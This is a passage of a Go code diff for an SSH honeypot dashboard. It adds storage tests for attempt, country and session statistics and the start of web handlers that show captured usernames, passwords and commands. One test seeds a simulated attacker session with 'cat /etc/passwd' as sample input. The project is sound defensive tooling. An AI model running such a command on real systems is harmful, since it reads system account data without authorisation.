t.Fatalf("GetAttemptsOverTime: %v", err)
|
||||||
|
}
|
||||||
|
if len(points) != 0 {
|
||||||
|
t.Errorf("expected empty, got %v", points)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("with data", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
points, err := store.GetAttemptsOverTime(context.Background(), 30, nil, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetAttemptsOverTime: %v", err)
|
||||||
|
}
|
||||||
|
// All data was inserted today, so should be one point.
|
||||||
|
if len(points) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(points))
|
||||||
|
}
|
||||||
|
// 5 + 3 + 2 = 10 total.
|
||||||
|
if points[0].Count != 10 {
|
||||||
|
t.Errorf("count = %d, want 10", points[0].Count)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetHourlyPattern(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
counts, err := store.GetHourlyPattern(context.Background(), nil, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetHourlyPattern: %v", err)
|
||||||
|
}
|
||||||
|
if len(counts) != 0 {
|
||||||
|
t.Errorf("expected empty, got %v", counts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("with data", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
counts, err := store.GetHourlyPattern(context.Background(), nil, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetHourlyPattern: %v", err)
|
||||||
|
}
|
||||||
|
// All data was inserted at the same hour.
|
||||||
|
if len(counts) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(counts))
|
||||||
|
}
|
||||||
|
if counts[0].Count != 10 {
|
||||||
|
t.Errorf("count = %d, want 10", counts[0].Count)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetCountryStats(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
counts, err := store.GetCountryStats(context.Background())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetCountryStats: %v", err)
|
||||||
|
}
|
||||||
|
if len(counts) != 0 {
|
||||||
|
t.Errorf("expected empty, got %v", counts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("with data", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
counts, err := store.GetCountryStats(context.Background())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetCountryStats: %v", err)
|
||||||
|
}
|
||||||
|
if len(counts) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(counts))
|
||||||
|
}
|
||||||
|
// CN: 5 + 2 = 7, RU: 3 - ordered by count DESC.
|
||||||
|
if counts[0].Country != "CN" || counts[0].Count != 7 {
|
||||||
|
t.Errorf("counts[0] = %+v, want CN/7", counts[0])
|
||||||
|
}
|
||||||
|
if counts[1].Country != "RU" || counts[1].Count != 3 {
|
||||||
|
t.Errorf("counts[1] = %+v, want RU/3", counts[1])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("excludes empty country", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "test", "test", "10.0.0.1", ""); err != nil {
|
||||||
|
t.Fatalf("seeding: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "test", "test", "10.0.0.2", "US"); err != nil {
|
||||||
|
t.Fatalf("seeding: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
counts, err := store.GetCountryStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetCountryStats: %v", err)
|
||||||
|
}
|
||||||
|
if len(counts) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(counts))
|
||||||
|
}
|
||||||
|
if counts[0].Country != "US" {
|
||||||
|
t.Errorf("country = %q, want US", counts[0].Country)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetFilteredDashboardStats(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("no filter", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
if stats.TotalAttempts != 10 {
|
||||||
|
t.Errorf("TotalAttempts = %d, want 10", stats.TotalAttempts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("filter by country", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{Country: "CN"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
// CN: 5 + 2 = 7
|
||||||
|
if stats.TotalAttempts != 7 {
|
||||||
|
t.Errorf("TotalAttempts = %d, want 7", stats.TotalAttempts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("filter by IP", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{IP: "10.0.0.1"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
if stats.TotalAttempts != 5 {
|
||||||
|
t.Errorf("TotalAttempts = %d, want 5", stats.TotalAttempts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("filter by username", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{Username: "admin"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
if stats.TotalAttempts != 3 {
|
||||||
|
t.Errorf("TotalAttempts = %d, want 3", stats.TotalAttempts)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetFilteredTopUsernames(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedChartData(t, store)
|
||||||
|
|
||||||
|
// Filter by country CN should only show root.
|
||||||
|
entries, err := store.GetFilteredTopUsernames(context.Background(), 10, DashboardFilter{Country: "CN"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredTopUsernames: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(entries))
|
||||||
|
}
|
||||||
|
if entries[0].Value != "root" || entries[0].Count != 7 {
|
||||||
|
t.Errorf("entries[0] = %+v, want root/7", entries[0])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetRecentSessions(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 0 {
|
||||||
|
t.Errorf("expected empty, got %d", len(sessions))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("all sessions", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(sessions))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("active only", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 10, true)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].DisconnectedAt != nil {
|
||||||
|
t.Error("active session should have nil DisconnectedAt")
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("limit", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(context.Background(), 1, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInputBytes(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("counts only input direction", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
now := time.Now().UTC()
|
||||||
|
events := []SessionEvent{
|
||||||
|
{SessionID: id, Timestamp: now, Direction: 0, Data: []byte("ls\n")}, // 3 bytes input
|
||||||
|
{SessionID: id, Timestamp: now.Add(100 * time.Millisecond), Direction: 1, Data: []byte("file1\nfile2\n")}, // 11 bytes output
|
||||||
|
{SessionID: id, Timestamp: now.Add(200 * time.Millisecond), Direction: 0, Data: []byte("pwd\n")}, // 4 bytes input
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionEvents(ctx, events); err != nil {
|
||||||
|
t.Fatalf("AppendSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(ctx, 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
// Only direction=0 data: "ls\n" (3) + "pwd\n" (4) = 7
|
||||||
|
if sessions[0].InputBytes != 7 {
|
||||||
|
t.Errorf("InputBytes = %d, want 7", sessions[0].InputBytes)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("zero when no events", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
_, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(ctx, 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].InputBytes != 0 {
|
||||||
|
t.Errorf("InputBytes = %d, want 0", sessions[0].InputBytes)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetFilteredSessions(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("filter by human score", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Create two sessions, one with human score > 0.
|
||||||
|
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "CN")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.UpdateHumanScore(ctx, id1, 0.75); err != nil {
|
||||||
|
t.Fatalf("UpdateHumanScore: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "US")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{HumanScoreAboveZero: true})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].ID != id1 {
|
||||||
|
t.Errorf("expected session %s, got %s", id1, sessions[0].ID)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("sort by input bytes", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Session with more input (created first).
|
||||||
|
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
now := time.Now().UTC()
|
||||||
|
if err := store.AppendSessionEvents(ctx, []SessionEvent{
|
||||||
|
{SessionID: id1, Timestamp: now, Direction: 0, Data: []byte("ls -la /tmp\n")},
|
||||||
|
{SessionID: id1, Timestamp: now.Add(time.Millisecond), Direction: 0, Data: []byte("cat /etc/passwd\n")},
|
||||||
|
}); err != nil {
|
||||||
|
t.Fatalf("AppendSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Session with less input (created after id1, so would be first by connected_at).
|
||||||
|
// Sleep >1s to ensure different RFC3339 timestamps in SQLite.
|
||||||
|
time.Sleep(1100 * time.Millisecond)
|
||||||
|
id2, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionEvents(ctx, []SessionEvent{
|
||||||
|
{SessionID: id2, Timestamp: now.Add(2 * time.Second), Direction: 0, Data: []byte("x\n")},
|
||||||
|
}); err != nil {
|
||||||
|
t.Fatalf("AppendSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Default sort (connected_at DESC) should show id2 first.
|
||||||
|
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].ID != id2 {
|
||||||
|
t.Errorf("default sort: expected %s first, got %s", id2, sessions[0].ID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Sort by input_bytes should show id1 first (more input).
|
||||||
|
sessions, err = store.GetFilteredSessions(ctx, 50, false, DashboardFilter{SortBy: "input_bytes"})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].ID != id1 {
|
||||||
|
t.Errorf("input_bytes sort: expected %s first, got %s", id1, sessions[0].ID)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("combined filters", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "CN")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.UpdateHumanScore(ctx, id1, 0.5); err != nil {
|
||||||
|
t.Fatalf("UpdateHumanScore: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Different country, also has score.
|
||||||
|
id2, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "US")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.UpdateHumanScore(ctx, id2, 0.8); err != nil {
|
||||||
|
t.Fatalf("UpdateHumanScore: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Same country CN but no score.
|
||||||
|
_, err = store.CreateSession(ctx, "10.0.0.3", "test", "bash", "CN")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Filter: CN + human score > 0 -> only id1.
|
||||||
|
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{
|
||||||
|
Country: "CN",
|
||||||
|
HumanScoreAboveZero: true,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetFilteredSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].ID != id1 {
|
||||||
|
t.Errorf("expected session %s, got %s", id1, sessions[0].ID)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
441
internal/web/handlers.go
Normal file
441
internal/web/handlers.go
Normal file
@@ -0,0 +1,441 @@
|
|||||||
|
package web
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/base64"
|
||||||
|
"encoding/json"
|
||||||
|
"net/http"
|
||||||
|
"strconv"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// dbContext returns a context detached from the HTTP request lifecycle with a
|
||||||
|
// 30-second timeout. This prevents HTMX polling from canceling in-flight DB
|
||||||
|
// queries when the browser aborts the previous XHR.
|
||||||
|
func dbContext(r *http.Request) (context.Context, context.CancelFunc) {
|
||||||
|
return context.WithTimeout(context.WithoutCancel(r.Context()), 30*time.Second)
|
||||||
|
}
|
||||||
|
|
||||||
|
type dashboardData struct {
|
||||||
|
Stats *storage.DashboardStats
|
||||||
|
TopUsernames []storage.TopEntry
|
||||||
|
TopPasswords []storage.TopEntry
|
||||||
|
TopIPs []storage.TopEntry
|
||||||
|
TopCountries []storage.TopEntry
|
||||||
|
TopExecCommands []storage.TopEntry
|
||||||
|
ActiveSessions []storage.Session
|
||||||
|
RecentSessions []storage.Session
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleDashboard(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
stats, err := s.store.GetDashboardStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get dashboard stats", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topUsernames, err := s.store.GetTopUsernames(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get top usernames", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topPasswords, err := s.store.GetTopPasswords(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get top passwords", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topIPs, err := s.store.GetTopIPs(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get top IPs", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topCountries, err := s.store.GetTopCountries(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get top countries", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
topExecCommands, err := s.store.GetTopExecCommands(ctx, 10)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get top exec commands", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
activeSessions, err := s.store.GetRecentSessions(ctx, 50, true)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get active sessions", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
recentSessions, err := s.store.GetRecentSessions(ctx, 50, false)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get recent sessions", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
data := dashboardData{
|
||||||
|
Stats: stats,
|
||||||
|
TopUsernames: topUsernames,
|
||||||
|
TopPasswords: topPasswords,
|
||||||
|
TopIPs: topIPs,
|
||||||
|
TopCountries: topCountries,
|
||||||
|
TopExecCommands: topExecCommands,
|
||||||
|
ActiveSessions: activeSessions,
|
||||||
|
RecentSessions: recentSessions,
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.dashboard.ExecuteTemplate(w, "layout.html", data); err != nil {
|
||||||
|
s.logger.Error("failed to render dashboard", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleFragmentStats(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
stats, err := s.store.GetDashboardStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get dashboard stats", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.dashboard.ExecuteTemplate(w, "stats", stats); err != nil {
|
||||||
|
s.logger.Error("failed to render stats fragment", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleFragmentActiveSessions(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sessions, err := s.store.GetRecentSessions(ctx, 50, true)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get active sessions", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.dashboard.ExecuteTemplate(w, "active_sessions", sessions); err != nil {
|
||||||
|
s.logger.Error("failed to render active sessions fragment", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleFragmentRecentSessions(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
f := parseDashboardFilter(r)
|
||||||
|
sessions, err := s.store.GetFilteredSessions(ctx, 50, false, f)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get filtered sessions", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.dashboard.ExecuteTemplate(w, "recent_sessions", sessions); err != nil {
|
||||||
|
s.logger.Error("failed to render recent sessions fragment", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type sessionDetailData struct {
|
||||||
|
Session *storage.Session
|
||||||
|
Logs []storage.SessionLog
|
||||||
|
EventCount int
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleSessionDetail(w http.ResponseWriter, r *http.Request) {
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
sessionID := r.PathValue("id")
|
||||||
|
|
||||||
|
session, err := s.store.GetSession(ctx, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get session", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if session == nil {
|
||||||
|
http.NotFound(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
logs, err := s.store.GetSessionLogs(ctx, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get session logs", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
events, err := s.store.GetSessionEvents(ctx, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to get session events", "err", err)
|
||||||
|
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
data := sessionDetailData{
|
||||||
|
Session: session,
|
||||||
|
Logs: logs,
|
||||||
|
EventCount: len(events),
|
||||||
|
}
|
||||||
|
|
||||||
|
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||||
|
if err := s.tmpl.sessionDetail.ExecuteTemplate(w, "layout.html", data); err != nil {
|
||||||
|
s.logger.Error("failed to render session detail", "err", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiEvent struct {
|
||||||
|
T int64 `json:"t"`
|
||||||
|
D int `json:"d"`
|
||||||
|
Data string `json:"data"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiEventsResponse struct {
|
||||||
|
Events []apiEvent `json:"events"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseDateParam parses a "YYYY-MM-DD" query parameter into a *time.Time.
|
||||||
|
func parseDateParam(r *http.Request, name string) *time.Time {
|
||||||
|
v := r.URL.Query().Get(name)
|
||||||
|
if v == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
t, err := time.Parse("2006-01-02", v)
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
// For "until" dates, set to end of day.
|
||||||
|
if name == "until" {
|
||||||
|
t = t.Add(24*time.Hour - time.Second)
|
||||||
|
}
|
||||||
|
return &t
|
||||||
|
}
|
||||||
|
|
||||||
|
func parseDashboardFilter(r *http.Request) storage.DashboardFilter {
|
||||||
|
return storage.DashboardFilter{
|
||||||
|
Since: parseDateParam(r, "since"),
|
||||||
|
Until: parseDateParam(r, "until"),
|
||||||
|
IP: r.URL.Query().Get("ip"),
|
||||||
|
Country: r.URL.Query().Get("country"),
|
||||||
|
Username: r.URL.Query().Get("username"),
|
||||||
|
HumanScoreAboveZero: r.URL.Query().Get("human_score") == "1",
|
||||||
|
SortBy: r.URL.Query().Get("sort"),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiTimeSeriesPoint struct {
|
||||||
|
Date string `json:"date"`
|
||||||
|
Count int64 `json:"count"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type apiAttemptsOverTimeResponse struct {
|
||||||
|
Points []apiTimeSeriesPoint `json:"points"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *Server) handleAPIAttemptsOverTime(w http.ResponseWriter, r *http.Request) {
|
||||||
|
days := 30
|
||||||
|
if v := r.URL.Query().Get("days"); v != "" {
|
||||||
|
if d, err := strconv.Atoi(v); err == nil && d > 0 && d <= 365 {
|
||||||
|
days = d
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
since := parseDateParam(r, "since")
|
||||||
|
until := parseDateParam(r, "until")
|
||||||
|
|
||||||
|
ctx, cancel := dbContext(r)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
